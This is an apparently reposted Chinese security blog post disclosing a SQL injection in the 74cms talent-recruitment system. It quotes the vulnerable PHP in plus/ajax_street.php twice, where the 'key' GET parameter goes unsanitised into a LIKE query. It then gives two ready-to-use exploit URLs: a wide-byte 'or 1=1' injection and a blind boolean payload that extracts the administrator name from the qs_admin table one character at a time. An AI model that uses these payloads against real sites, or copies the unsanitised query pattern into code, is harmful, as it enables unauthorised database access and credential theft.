骑士cms人才系统 通杀SQL注入

没穿底裤 2019年12月31日20:39:23评论500 views字数 579阅读1分55秒阅读模式
摘要

代码出现在plus/ajax_street.php文件中
[php]
43行开始elseif($act == 'key')
{
$key=trim($_GET['key']);
if (!empty($key))
{
if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0) $key=iconv("utf-8",QISHI_DBCHARSET,$key);
$result = $db->query("select * from ".table('category')." where c_alias='QS_street' AND c_name LIKE '%{$key}%' ");
while($row = $db->fetch_array($result))
{
if ($listtype=="li")
[/php]

代码出现在plus/ajax_street.php文件中
[php]
43行开始

elseif($act == 'key')
{
$key=trim($_GET['key']);
if (!empty($key))
{
if (strcasecmp(QISHI_DBCHARSET,"utf8")!=0) $key=iconv("utf-8",QISHI_DBCHARSET,$key);
$result = $db->query("select * from ".table('category')." where c_alias='QS_street' AND c_name LIKE '%{$key}%' ");
while($row = $db->fetch_array($result))
{
if ($listtype=="li")
[/php]

利用如下
[php]http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or 1=1%23

http://0day5.com/upload/plus/ajax_street.php?act=key&key=s%e9%8c%a6' or cast(ascii(substring((select admin_name from qs_admin),1,1))=97 as signed) %23[/php]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2019年12月31日20:39:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   骑士cms人才系统 通杀SQL注入https://cn-sec.com/archives/75397.html

发表评论

匿名网友 填写信息